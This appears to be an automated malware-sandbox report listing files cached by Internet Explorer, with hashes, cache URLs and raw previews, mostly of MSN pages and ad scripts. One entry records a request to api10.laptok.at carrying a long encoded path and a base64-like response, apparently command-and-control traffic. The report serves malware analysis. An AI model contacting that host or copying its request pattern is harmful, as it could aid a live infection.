                                                                                SHA1:CAFB3A8ABA2423C99C218C298C28774857BEBB46
                                                                                SHA-256:4CC08B49D22AF4993F4B43FD05DE6E1E98451A83B3C09198F58D1BAFD0B1BFC3
                                                                                SHA-512:34001CBE0731E45FB000E31E45C7D7FEE039548B3EA91EBE05156A4040FA45BC75062A0077BF15E0D5255C37FE30F5AE3D7F64FDD10386FFBB8FDB35ED8145FC
                                                                                Malicious:false
                                                                                IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBkwUr.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                                                                                Preview: .PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........(J....DIDAT8O..M.EA...sad&V l.o.b.X..........O,.+..D....8_u.N.y.$......5.E..D.......@...A.2.....!..7.X.w..H.../..W2.....".......c.Q......x+f..w.H.`...1...J.....~'.{z)fj...`I.W.M..(.!..&E..b...8.1w.U...K.O,.....1...D.C..J....a..2P.9.j.@.......4l....Kg6.....#........g....n.>.p.....Q........h1.g .qA\..A..L .|ED...>h....#....IEND.B`.
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\E[1].htm
                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                Category:downloaded
                                                                                Size (bytes):270440
                                                                                Entropy (8bit):5.999927116066864
                                                                                Encrypted:false
                                                                                SSDEEP:6144:Y+0C7j1OHxuaO32a5uF6e/jwm+JBJk18h++os7c2Wq/:YQ9Oc35663Xxb157cI/
                                                                                MD5:E924EC561FB47C3C0077569F989E9945
                                                                                SHA1:7B779431CDFB4199AB382029420C49A8E7145CBD
                                                                                SHA-256:620F9E87417B9B64C9CA5D8C86EADC68BE4EFBCD4F829857AA3E88CBCF8FFCEA
                                                                                SHA-512:61258962ADD49591F56ADE96442EF93067AB937903798757CE620AE1B6A7E05FCB4703A3CC25764A71963BC848E9924B20631A88511E48F0C93BF24AA079941A
                                                                                Malicious:false
                                                                                IE Cache URL:http://api10.laptok.at/api1/soyCaKjlo/B74XWyII6dEV1I0Co4Ut/l9VT5RjBdu9gqXWslrY/xc_2FK3McGJ0IzvFP1vJkO/Am1fQoOyYzGbM/xK7yrntx/Hruw1HZvAcfYl7dS_2F5g51/rLGjgSsh9h/OW8nevv3Dh4VYPuXW/03beET_2FA3a/YKD8HGeNgat/jK8A9eho17ABaL/cUew4H72hIfxngPdnFseX/f9MvJYHFQTCCYMoN/XdpbU1hBHNX722p/DPf7k1CgkBZqmPOtaO/MB_2B0Lh_/2FdHYj_2Bx0ZSPs6m_2F/GelX35xSpPMKNfn0Q3D/54O_2FBBcuPBTrZpvB9zhY/7AC9yYriaqcnPDRgK/E
                                                                                Preview: Mh76sSvSPOqc78Mw1cXKmfvRxMwaaWEKesJW7t3AmxNSv6lyFLsUY4n83l6Yoab2uwOf2DkFEA20NBf2B/PlNW0FGgZF1zakBvAAiOohIBorvfHvu0rE0MTzKZI6eVDmHbEQVaVPC4JsjuGf0N7E+9nHMyKQy+eomLvq8xg7jOLLutl9wiglWRzIFsmqwKpy+Jx9CmX6prDnV+YbPCPCzDGpeIOViLBndJ5aTmSzWtf9aozMC9nrgnDUx4Ja12aZHw96rQjFCZxnto2efGDVoGagL1Qb4es8tZyBB98MqaOkN3gT5988hQ+TylRyO5K4lVE2vU6ZAQDWQS7QTAWcVobl/1/Fox/23pZzLEIOLVJ/WfeqCtGDEE4bg8MFrEqWgAnzbeqJAbvubaYyD+0+Zcl/QheXkuMWbqBVzsn7YJZl11v+XPwuTsUH5WeJvTk+FAdawWNtrMlftd/5E8XgzDC/GoU1RPapJvOBn4UQnvupdMy8aUXPwNvTlZyncvCeIkr6420wlShxBVKfmC/p4CKUGM/0Yv46mRy3vfvWoM+DtcTTZOTd6uI32X/2ZWZzW1PC1xjLuJj+8pSGzgC9qGzoy5mXq1Jr731LoMV/sc6Vvm+ZvYN4Rd7G2gqgEK/DM4x+8pRx6WlgFvZLkEfp1NRz28ySvazWWxtjhFJmVW+2mpNjMQF5be5jSkmr2L6IGNu+780K4UJeiStDfPCA+xYYEXw9+fIw35o6XmsmSNuR3mzl8LKK/wAOyo/qIpQbX1D1EMIdW515W1AY8WwNEtN6Ri2otZ2LWGX0anUNlUxeO9PP6PypAKVYJ8CkE2JjqkpT0qeevIhmgtanzqUQxFa66tcEkAxsRnwObim3obpVGch3Sq3RpEiLvbZAO8UBrtIcqyiuJgmDTq+L/EZpdrTIioUAumq9Zl0hnteCIUF+35rXjTsfnkl7axJeycpBVo3+yFRHLOp1Jwc+dmTYtlD1/fd48Q/Z0cmd511h
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\a8a064[1].gif
                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                File Type:GIF image data, version 89a, 28 x 28
                                                                                Category:downloaded
                                                                                Size (bytes):16360
                                                                                Entropy (8bit):7.019403238999426
                                                                                Encrypted:false
                                                                                SSDEEP:384:g2SEiHys4AeP/6ygbkUZp72i+ccys4AeP/6ygbkUZaoGBm:g2Tjs4Ae36kOpqi+c/s4Ae36kOaoGm
                                                                                MD5:3CC1C4952C8DC47B76BE62DC076CE3EB
                                                                                SHA1:65F5CE29BBC6E0C07C6FEC9B96884E38A14A5979
                                                                                SHA-256:10E48837F429E208A5714D7290A44CD704DD08BF4690F1ABA93C318A30C802D9
                                                                                SHA-512:5CC1E6F9DACA9CEAB56BD2ECEEB7A523272A664FE8EE4BB0ADA5AF983BA98DBA8ECF3848390DF65DA929A954AC211FF87CE4DBFDC11F5DF0C6E3FEA8A5740EF7
                                                                                Malicious:false
                                                                                IE Cache URL:https://static-global-s-msn-com.akamaized.net/hp-neu/sc/64/a8a064.gif
                                                                                Preview: GIF89a.......dbd...........lnl.........trt..................!..NETSCAPE2.0.....!.......,..........+..I..8...`(.di.h..l.p,..(.........5H.....!.......,.........dbd...........lnl......dfd....................../..I..8...`(.di.h..l..e.....Q... ..-.3...r...!.......,.........dbd..............tvt...........................*P.I..8...`(.di.h.v.....A<.. ......pH,.A..!.......,.........dbd........|~|......trt...ljl.........dfd......................................................B`%.di.h..l.p,.t]S......^..hD..F. .L..tJ.Z..l.080y..ag+...b.H...!.......,.........dbd.............ljl.............dfd........lnl..............................................B.$.di.h..l.p.'J#............9..Eq.l:..tJ......E.B...#.....N...!.......,.........dbd...........tvt.....ljl.......dfd.........|~|.............................................D.$.di.h..l.NC.....C...0..)Q..t...L:..tJ.....T..%...@.UH...z.n.....!.......,.........dbd..............lnl.........ljl......dfd...........trt...
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\cf0f64e7-0354-429d-b700-c0cb0384258a[1].jpg
                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 300x300, frames 3
                                                                                Category:downloaded
                                                                                Size (bytes):87750
                                                                                Entropy (8bit):7.971920862407236
                                                                                Encrypted:false
                                                                                SSDEEP:1536:rV71v5me8Il0WbASXD+HpcgZz9UoN2VXWmWZ8kiTbL/AR9v2jpW4JgJs:Z71RJl0WhXDEA5WTZt/MpTOu
                                                                                MD5:C664CC3A06C7E91256C992E6DBC7F38C
                                                                                SHA1:68D9D406B5536B88D3DE4B339E9E53FD546572B4
                                                                                SHA-256:8812FF9A4A6A6D35408460D10BF89FAC4BCB7DC44EDEA5067013789F544458F2
                                                                                SHA-512:00D7320664B6C0786534AF7E4D709926E1CC8627A6AFA6063A67234F4616B77F8F1460C6214B5B22C5CD1442C5B69705A18E7B0D8F82E3B0BB9A4DEE6943966C
                                                                                Malicious:false
                                                                                IE Cache URL:https://cvision.media.net/new/300x300/2/249/108/181/cf0f64e7-0354-429d-b700-c0cb0384258a.jpg?v=9
                                                                                Preview: ......JFIF.............C....................................................................C.......................................................................,.,.."...........................................B............................!.."..1#2A.Qa$B..3q.%R4C...b.5Tr......................................?........................!..1."A.Q.#2a.Bq.....3R....$%C..br..S............?...dF.....k..c.....6f.6...Z9Xl.G.%..%{U\Dc^A.."....M.....`...h..../lhEGv...W......?e.R...."y.P.....a...5.&...v...zGQ...)...s...g.......]...@..v..~[......2.X.h..U.....dE.Z......6O_.8...<.m.[.Q<...7O.........3V..I{....+..y..G.k..{xk.6U.wEV....%...8..H..=....."..7.[..(.U.oQ...RI;...B.!q..#..8..:.Zg{...a...*.........|...@.+^'(..r.l..?.E......>..W..F...r..h.].9.....'.....o6.B..J.x...G.|\E..v.W....E..aQ.';H&'!..V"*...n..rs...?..:.rX.',7.Q...|....x.?..V.E...v+l..p....,q..~.H...G.....W&.y=.....TE.....O(.b.......O."...r..m........j......uk.>).^H..*'._.\...." ..g7..&..=.5W
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\checksync[1].htm
                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                File Type:HTML document, ASCII text, with very long lines
                                                                                Category:dropped
                                                                                Size (bytes):20808
                                                                                Entropy (8bit):5.301767642140402
                                                                                Encrypted:false
                                                                                SSDEEP:384:RqAGcVXlblcqnzleZSug2f5vzBgF3OZOsQWwY4RXrqt:+86qhbz2RmF3OssQWwY4RXrqt
                                                                                MD5:97A17EFCA6ECAE418CACBBF6AE41B0B1
                                                                                SHA1:31235CDB60298018C1C0D1EFE712FF3281A7B29B
                                                                                SHA-256:00FFE70B03F4DF3A0D653D15DF9DB3D4451AD931953B44F9541DD59D8538FD90
                                                                                SHA-512:DA7EE38B51F31BDA399E68AC9D6CA7532C846C7BF466E94F40CB7C6382F1A64F0567A3BCE85D12E1F37F84F4765FF703405309E6A545FE8D482B0EFEAAE9E525
                                                                                Malicious:false
                                                                                Preview: <html> <head></head> <body> <script type="text/javascript">try{.var cookieSyncConfig = {"datalen":75,"visitor":{"vsCk":"visitor-id","vsDaCk":"data","sepVal":"|","sepTime":"*","sepCs":"~~","vsDaTime":31536000,"cc":"CH","zone":"d"},"cs":"1","lookup":{"g":{"name":"g","cookie":"data-g","isBl":1,"g":1,"cocs":0},"vzn":{"name":"vzn","cookie":"data-v","isBl":1,"g":0,"cocs":0},"brx":{"name":"brx","cookie":"data-br","isBl":1,"g":0,"cocs":0},"lr":{"name":"lr","cookie":"data-lr","isBl":1,"g":1,"cocs":0}},"hasSameSiteSupport":"0","batch":{"gGroups":["apx","csm","ppt","rbcn","son","bdt","con","opx","tlx","mma","c1x","ys","sov","fb","r1","g","pb","dxu","rkt","trx","wds","crt","ayl","bs","ui","shr","lvr","yld","msn","zem","dmx","pm","som","adb","tdd","soc","adp","vm","spx","nat","ob","adt","got","mf","emx","sy","lr","ttd"],"bSize":2,"time":30000,"ngGroups":[]},"log":{"successLper":10,"failLper":10,"logUrl":{"cl":"https:\/\/hblg.media.net\/log?logid=kfk&evtid=chlog"}},"csloggerUrl":"https:\/\/cslogger.
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\checksync[2].htm
                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                File Type:HTML document, ASCII text, with very long lines
                                                                                Category:dropped
                                                                                Size (bytes):20808
                                                                                Entropy (8bit):5.301767642140402
                                                                                Encrypted:false
                                                                                SSDEEP:384:RqAGcVXlblcqnzleZSug2f5vzBgF3OZOsQWwY4RXrqt:+86qhbz2RmF3OssQWwY4RXrqt
                                                                                MD5:97A17EFCA6ECAE418CACBBF6AE41B0B1
                                                                                SHA1:31235CDB60298018C1C0D1EFE712FF3281A7B29B
                                                                                SHA-256:00FFE70B03F4DF3A0D653D15DF9DB3D4451AD931953B44F9541DD59D8538FD90
                                                                                SHA-512:DA7EE38B51F31BDA399E68AC9D6CA7532C846C7BF466E94F40CB7C6382F1A64F0567A3BCE85D12E1F37F84F4765FF703405309E6A545FE8D482B0EFEAAE9E525
                                                                                Malicious:false
                                                                                Preview: <html> <head></head> <body> <script type="text/javascript">try{.var cookieSyncConfig = {"datalen":75,"visitor":{"vsCk":"visitor-id","vsDaCk":"data","sepVal":"|","sepTime":"*","sepCs":"~~","vsDaTime":31536000,"cc":"CH","zone":"d"},"cs":"1","lookup":{"g":{"name":"g","cookie":"data-g","isBl":1,"g":1,"cocs":0},"vzn":{"name":"vzn","cookie":"data-v","isBl":1,"g":0,"cocs":0},"brx":{"name":"brx","cookie":"data-br","isBl":1,"g":0,"cocs":0},"lr":{"name":"lr","cookie":"data-lr","isBl":1,"g":1,"cocs":0}},"hasSameSiteSupport":"0","batch":{"gGroups":["apx","csm","ppt","rbcn","son","bdt","con","opx","tlx","mma","c1x","ys","sov","fb","r1","g","pb","dxu","rkt","trx","wds","crt","ayl","bs","ui","shr","lvr","yld","msn","zem","dmx","pm","som","adb","tdd","soc","adp","vm","spx","nat","ob","adt","got","mf","emx","sy","lr","ttd"],"bSize":2,"time":30000,"ngGroups":[]},"log":{"successLper":10,"failLper":10,"logUrl":{"cl":"https:\/\/hblg.media.net\/log?logid=kfk&evtid=chlog"}},"csloggerUrl":"https:\/\/cslogger.
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\e151e5[1].gif
                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                Category:downloaded
                                                                                Size (bytes):43
                                                                                Entropy (8bit):3.122191481864228
                                                                                Encrypted:false
                                                                                SSDEEP:3:CUTxls/1h/:7lU/
                                                                                MD5:F8614595FBA50D96389708A4135776E4
                                                                                SHA1:D456164972B508172CEE9D1CC06D1EA35CA15C21
                                                                                SHA-256:7122DE322879A654121EA250AEAC94BD9993F914909F786C98988ADBD0A25D5D
                                                                                SHA-512:299A7712B27C726C681E42A8246F8116205133DBE15D549F8419049DF3FCFDAB143E9A29212A2615F73E31A1EF34D1F6CE0EC093ECEAD037083FA40A075819D2
                                                                                Malicious:false
                                                                                IE Cache URL:https://static-global-s-msn-com.akamaized.net/hp-neu/sc/9b/e151e5.gif
                                                                                Preview: GIF89a.............!.......,...........D..;
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\fcmain[1].js
                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                File Type:HTML document, ASCII text, with very long lines, with no line terminators
                                                                                Category:downloaded
                                                                                Size (bytes):38517
                                                                                Entropy (8bit):5.060847361917845
                                                                                Encrypted:false
                                                                                SSDEEP:768:I1av44u3hPPKW94h5FEEJ3SrYXf9wOBEZn3SQN3GFl295oThlIV/thlUsP:gQ44uR6Wmh5FZJCrYXf9wOBEZn3SQN35
                                                                                MD5:6F8E6F759EF116DBA81FB41F3DDFAFC4
                                                                                SHA1:202B334BE761AA84251EEDA9DEF06803E1F8DCF3
                                                                                SHA-256:52D6908816CBEA2E774FB6408EF07E2C3E3363DBB99A217770304BA3DD04A1A1
                                                                                SHA-512:1BA16E2F01C1A5DE214F7FE7E1C1591E190CEEDC5A8E5803D106AE43FAF415CFAE7306F0D786E169ACE713FDDD85DA4D6D024DE8CC7F21E4FDEA0F31E87F0C90
                                                                                Malicious:false
                                                                                IE Cache URL:https://contextual.media.net/803288796/fcmain.js?&gdpr=0&cid=8CU157172&cpcd=pC3JHgSCqY8UHihgrvGr0A%3D%3D&crid=858412214&size=306x271&cc=CH&https=1&vif=2&requrl=https%3A%2F%2Fwww.msn.com%2Fde-ch%2F%3Focid%3Diehp&nse=5&vi=1613433454754446388&ugd=4&rtbs=1&nb=1&cb=window._mNDetails.initAd
                                                                                Preview: ;window._mNDetails.initAd({"vi":"1613433454754446388","s":{"_mNL2":{"size":"306x271","viComp":"1613432325518932237","hideAdUnitABP":true,"abpl":"3","custHt":"","setL3100":"1"},"lhp":{"l2wsip":"2887305228","l2ac":"","sethcsd":"set!N7|983"},"_mNe":{"pid":"8PO8WH2OT","requrl":"https://www.msn.com/de-ch/?ocid=iehp#mnetcrid=858412214#"},"_md":[],"ac":{"content":"<!DOCTYPE HTML PUBLIC \"-\/\/W3C\/\/DTD HTML 4.01 Transitional\/\/EN\" \"http:\/\/www.w3.org\/TR\/html4\/loose.dtd\">\r\n<html xmlns=\"http:\/\/www.w3.org\/1999\/xhtml\">\r\n<head><meta http-equiv=\"x-dns-prefetch-control\" content=\"on\"><style type=\"text\/css\">body{background-color: transparent;}<\/style><meta name=\"tids\" content=\"a='800072941' b='803767816' c='msn.com' d='entity type'\" \/><script type=\"text\/javascript\">try{window.locHash = (parent._mNDetails && parent._mNDetails.getLocHash && parent._mNDetails.getLocHash(\"858412214\",\"1613433454754446388\")) || (parent._mNDetails[\"locHash\"] && paren
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\http___cdn.taboola.com_libtrc_static_thumbnails_238d309261f67bed86c9e8aa10fc588b[1].jpg
                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
                                                                                Category:downloaded
                                                                                Size (bytes):28048
                                                                                Entropy (8bit):7.981103278092901
                                                                                Encrypted:false
                                                                                SSDEEP:768:rlcPWmag1qOEkRO/Wia02BEiUdtRuAgoV0:rePHaghEkR8Wi7TfvwH3
                                                                                MD5:A70D7122C862C0F01528A1F93589D83D
                                                                                SHA1:BE781CD9FE5131FA5FE2C38123CF3FD6BADA8DEB
                                                                                SHA-256:CE00F8D5A630C14165C900C9951A36A2BA6D10F594C9CA70A525BE27616BA348
                                                                                SHA-512:159B38F1AA2DEB5710033B642507F161BCB449FD730A2B3597653CB23F4D7D4BE1AF5CBFAA085BC3B0EC8AF654C2D44B50E62C16F805B0352B4B2C643F707FC0
                                                                                Malicious:false
                                                                                IE Cache URL:https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F238d309261f67bed86c9e8aa10fc588b.jpg
                                                                                Preview: ......JFIF.....................................................................&""&0-0>>T............................."......".$...$.6*&&*6>424>LDDL_Z_||.......7...............7....................................................................L. @..... @..... A.A.@..T|}../...+...+.../..8..9P @.......j.-..{9.....l.8n....v.j.......J...d].t"..hgA...my....v9.D.gT......c.s..7.I.t.oy.....9.._...:.6.k....l..'.+8.4.._F!..;~U..E.......).G..7..`n.9k.zl.:/Q....t..:.!C.#...;..d..B.....K ...W.%.9B...XlM....?..p.7:8r-.=.?<7|.G}:.s....Q_O.....K...U...!.3...b>k.,A.V...K#....u.y.oy.B'xd.|Uv^.........>[7.....}_.x.....y..c...T..[.._......e.;.4.".u...6=..,2..H...:.~..7......h....u..8=Y..k.%..V.fi.d.|.......S:.^...n...gM]J.}.................[b.%..8.j.Q.K..bz...3..)...n....t..g%....H.kG.....Tad.._@.....\=.BG.O.:. ..O..)a.Lu...V....{.r.Z./..._,..2.!.V..,..j.ia.5Bi....Vz...V.[......M..z.y.J..nBy....r7..M!...f.3_R......Ay.......$V...I....b.t/....s. ...O.....$..g...g.....m2;uaj}.
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\http___cdn.taboola.com_libtrc_static_thumbnails_364ccba5a2a1f24c6bdf8dc3ebfab401[1].jpg
                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
                                                                                Category:downloaded
                                                                                Size (bytes):17434
                                                                                Entropy (8bit):7.967756382059833
                                                                                Encrypted:false
                                                                                SSDEEP:384:lJoDVJtQpVLD6R2FeY3eKH76+3wnkvMY02yKH117:q/tQpt6TYOKH76+3wd2yKHv7
                                                                                MD5:2974B2FEE96071D36489EC1BC02018DA
                                                                                SHA1:23E09CF95DE51E72BD71CD97DB60E2DA434EDDD2
                                                                                SHA-256:A0ED26EE84BDF04A87A21D5DA35FC13A09EA3179C85B1FFB2F15388ADE0BDA79
                                                                                SHA-512:D04F76415881D9DCC43963B1A68EDB79B6F48C2CD0FF3CEEA4C12DA02ECDDA69BB6704D2921A95A19FED3571D931E425D119D310940383E1D2CCC9C9E2F65244
                                                                                Malicious:false
                                                                                IE Cache URL:https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F364ccba5a2a1f24c6bdf8dc3ebfab401.jpg
                                                                                Preview: ......JFIF.....................................................................&""&0-0>>T.......................................................&""&0-0>>T......7...."..........4.................................................................k6,..z.......X.C .."BjJ..k1!Fh#5..3...l.1....p....1...K91...k2..`AA2...F..2.r.....h.f.`..R..2.3..4......P.P...0..lT.9..@0.F@. jT.0....3(..d.... d.9.....K.......(.. ..`.@..0....`....><.c.ap.....L........$..L.HX..4....4..g..&D.;Y.V.P.-# .$...,..,..4.... .X.3..s.)j.q..+...#.....s.l.&..vk...I...x_......u..}R9.W..G..0.a(.yL.T.{c..]......?%..&Q...>...'...+8Kk.:..#9y..{/.W..>.5...hW.<....x...K..,17v........G..z....w?=...H.YgZq.i`W.0......1..i.^...*..a..v.....N..s....7:=...u%......3...D...*......V.N...a.~.K.|...7.....5....d..]?........C$..*r.&....T..}..K...wz....>..>y\76.ay[R.#s.y.m......k.s$....8.lz1.Py{.{n./.\......._.dN.E|}...9l>J.(N<Xf..~8o9.r.Oa...(.:.B.U....g...]...m....W[8kjQ.9:/.n....C2..=^w..-$H...v..ok...n...K.._..W..
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\nrrV67478[1].js
                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):88164
                                                                                Entropy (8bit):5.423101112677061
                                                                                Encrypted:false
                                                                                SSDEEP:1536:DVnCuukXGsQihGZFu94xdV2E4q35nJy0ukWaaCUFP+i/TX6Y+fj4/fhAaTZae:DQiYpdVGetuVLKY+fjwZ
                                                                                MD5:C2DC0FFE06279ECC59ACBC92A443FFD4
                                                                                SHA1:C271908D08B13E08BFD5106EE9F4E6487A3CDEC4
                                                                                SHA-256:51A34C46160A51FB0EAB510A83D06AA9F593C8BEB83099D066924EAC4E4160BC
                                                                                SHA-512:6B9EB80BD6BC121F4B8E23FC74FD21C81430EE10B39B1EDBDEFF29C04A3116EB12FC2CC633A5FF4C948C16FEF9CD258E0ED0743D3D9CB0EE78A253B6F5CBE05D
                                                                                Malicious:false
                                                                                Preview: var _mNRequire,_mNDefine;!function(){"use strict";var c={},u={};function a(e){return"function"==typeof e}_mNRequire=function e(t,r){var n,i,o=[];for(i in t)t.hasOwnProperty(i)&&("object"!=typeof(n=t[i])&&void 0!==n?(void 0!==c[n]||(c[n]=e(u[n].deps,u[n].callback)),o.push(c[n])):o.push(n));return a(r)?r.apply(this,o):o},_mNDefine=function(e,t,r){if(a(t)&&(r=t,t=[]),void 0===(n=e)||""===n||null===n||(n=t,"[object Array]"!==Object.prototype.toString.call(n))||!a(r))return!1;var n;u[e]={deps:t,callback:r}}}();_mNDefine("modulefactory",[],function(){"use strict";var r={},e={},o={},i={},n={},t={},a={};function c(r){var e=!0,o={};try{o=_mNRequire([r])[0]}catch(r){e=!1}return o.isResolved=function(){return e},o}return r=c("conversionpixelcontroller"),e=c("browserhinter"),o=c("kwdClickTargetModifier"),i=c("hover"),n=c("mraidDelayedLogging"),t=c("macrokeywords"),a=c("tcfdatamanager"),{conversionPixelController:r,browserHinter:e,hover:i,keywordClickTargetModifier:o,mraidDelayedLogging:n,macroKeyw
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\41-0bee62-68ddb2ab[1].js
                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):1238
                                                                                Entropy (8bit):5.066474690445609
                                                                                Encrypted:false
                                                                                SSDEEP:24:HWwAaHZRRIYfOeXPmMHUKq6GGiqIlQCQ6cQflgKioUInJaqzrQJ:HWwAabuYfO8HTq0xB6XfyNoUiJaD
                                                                                MD5:7ADA9104CCDE3FDFB92233C8D389C582
                                                                                SHA1:4E5BA29703A7329EC3B63192DE30451272348E0D
                                                                                SHA-256:F2945E416DDD2A188D0E64D44332F349B56C49AC13036B0B4FC946A2EBF87D99
                                                                                SHA-512:2967FBCE4E1C6A69058FDE4C3DC2E269557F7FAD71146F3CCD6FC9085A439B7D067D5D1F8BD2C7EC9124B7E760FBC7F25F30DF21F9B3F61D1443EC3C214E3FFF
                                                                                Malicious:false
                                                                                Preview: define("meOffice",["jquery","jqBehavior","mediator","refreshModules","headData","webStorage","window"],function(n,t,i,r,u,f,e){function o(t,o){function v(n){var r=e.localStorage,i,t,u;if(r&&r.deferLoadedItems)for(i=r.deferLoadedItems.split(","),t=0,u=i.length;t<u;t++)if(i[t]&&i[t].indexOf(n)!==-1){f.removeItem(i[t]);break}}function a(){var i=t.find("section li time");i.each(function(){var t=new Date(n(this).attr("datetime"));t&&n(this).html(t.toLocaleString())})}function p(){c=t.find("[data-module-id]").eq(0);c.length&&(h=c.data("moduleId"),h&&(l="moduleRefreshed-"+h,i.sub(l,a)))}function y(){i.unsub(o.eventName,y);r(s).done(function(){a();p()})}var s,c,h,l;return u.signedin||(t.hasClass("office")?v("meOffice"):t.hasClass("onenote")&&v("meOneNote")),{setup:function(){s=t.find("[data-module-deferred-hover], [data-module-deferred]").not("[data-sso-dependent]");s.length&&s.data("module-deferred-hover")&&s.html("<p class='meloading'><\/p>");i.sub(o.eventName,y)},teardown:function(){h&&i.un
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\4996b9[1].woff
                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                File Type:Web Open Font Format, TrueType, length 45633, version 1.0
                                                                                Category:downloaded
                                                                                Size (bytes):45633
                                                                                Entropy (8bit):6.523183274214988
                                                                                Encrypted:false
                                                                                SSDEEP:768:GiE2wcDeO5t68PKACfgVEwZfaDDxLQ0+nSEClr1X/7BXq/SH0Cl7dA7Q/B0WkAfO:82/DeO5M8PKASCZSvxQ0+TCPXtUSHF7c
                                                                                MD5:A92232F513DC07C229DDFA3DE4979FBA
                                                                                SHA1:EB6E465AE947709D5215269076F99766B53AE3D1
                                                                                SHA-256:F477B53BF5E6E10FA78C41DEAF32FA4D78A657D7B2EFE85B35C06886C7191BB9
                                                                                SHA-512:32A33CC9D6F2F1C962174F6CC636053A4BFA29A287AF72B2E2825D8FA6336850C902AB3F4C07FB4BF0158353EBBD36C0D367A5E358D9840D70B90B93DB2AE32D
                                                                                Malicious:false
                                                                                IE Cache URL:https://static-global-s-msn-com.akamaized.net/hp-neu/sc/ea/4996b9.woff
                                                                                Preview: wOFF.......A...........................,....OS/2...p...`...`B.Y.cmap.............G.glyf.......,...,0..Hhead.......6...6....hhea...,...$...$....hmtx............($LKloca...`...f...f....maxp...P... ... ....name............IU..post....... ... .*...........I.A_.<........... ........d.*.......................^...q.d.Z.................................................................3.......3.....f..............................HL .@...U...f.........................................\.d.\.d...d.e.d.Z.d.b.d.4.d.=.d.Y.d.c.d.].d.b.d.I.d.b.d.f.d._.d.^.d.(.d.b.d.^.d.b.d.b.d...d...d._.d._.d...d...d.P.d.0.d.b.d.b.d.P.d.u.d.c.d.^.d._.d.q.d._.d.d.d.b.d._.d._.d.b.d.a.d.b.d.a.d.b.d...d...d.^.d.^.d.`.d.[.d...d...d.$.d.p.d...d...d.^.d._.d.T.d...d.b.d.b.d.b.d.i.d.d.d...d...d...d.7.d.^.d.X.d.].d.).d.l.d.l.d.b.d.b.d.,.d.,.d.b.d.b.d...d...d...d.7.d.b.d.1.d.b.d.b.d...d...d...d...d...d.A.d...d...d.(.d.`.d...d...d.^.d.r.d.f.d.,.d.b.d...d.b.d._.d.q.d...d...d.b.d.b.d.b.d.b.d...d.r.d.I.d._.d.b.d.b.d.b.d.V.d.Z.d.b.d
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\755f86[1].png
                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                Category:downloaded
                                                                                Size (bytes):390
                                                                                Entropy (8bit):7.173321974089694
                                                                                Encrypted:false
                                                                                SSDEEP:6:6v/lhPZ/SlkR7+RGjVjKM4H56b6z69eG3AXGxQm+cISwADBOwIaqOTp:6v/71IkR7ZjKHHIr8GxQJcISwy0W9
                                                                                MD5:D43625E0C97B3D1E78B90C664EF38AC7
                                                                                SHA1:27807FBFB316CF79C4293DF6BC3B3DE7F3CFC896
                                                                                SHA-256:EF651D3C65005CEE34513EBD2CD420B16D45F2611E9818738FDEBF33D1DA7246
                                                                                SHA-512:F2D153F11DC523E5F031B9AA16AA0AB1CCA8BB7267E8BF4FFECFBA333E1F42A044654762404AA135BD50BC7C01826AFA9B7B6F28C24FD797C4F609823FA457B1
                                                                                Malicious:false
                                                                                IE Cache URL:https://static-global-s-msn-com.akamaized.net/hp-neu/sc/11/755f86.png
